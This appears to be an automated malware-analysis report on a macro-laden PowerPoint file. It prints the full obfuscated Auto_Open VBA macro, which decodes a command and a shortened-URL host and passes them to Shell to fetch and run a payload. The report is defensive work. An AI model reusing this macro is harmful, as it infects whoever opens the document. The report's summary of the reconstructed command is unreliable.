MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is an OOXML document containing a VBA macro that executes automatically when the document is opened. The macro uses character shifting and string concatenation to obfuscate a call to the Shell function, which is then used to execute a command. The reconstructed command is 'wjdwdowwjdaalijwdlidj', indicating the execution of a payload. This behavior is characteristic of macro-based malware designed to download and run additional malicious content.
Heuristics (5)

- VBA project inside OOXML (medium, 4 related findings) [OOXML_VBA]: Document contains a VBA project (VBA macros present).
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- VBA character-shift decoded Shell command (critical) [OLE_VBA_ASC_CHR_SHIFT_SHELL]: VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
- Auto_Open macro (high) [OLE_VBA_AUTO]: Auto_Open macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2956 bytes | ce90e1a54a5ef0ca85a2894ad2202a61e021c591f52efd026051dd96630b3346 |
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdwdowwjdaalijwdlidj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
Dim wDJHxwWIO As Integer
For wDJHxwWIO = 1 To Len(UE2EtbVNL)
GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:
PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"
GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:
PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"
GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:
wxGfLpElrKSIojk = "nYQCdOfjldCfJ"
GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:
wxGfLpElrKSIojk = "nYQCdOfjldCfJ"
GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:
Next wDJHxwWIO
GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:
End Function
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 19456 bytes | 5b4c471473c9b10f421dc4ea01d5e564241203922368448e1b789c003b2bbac6 |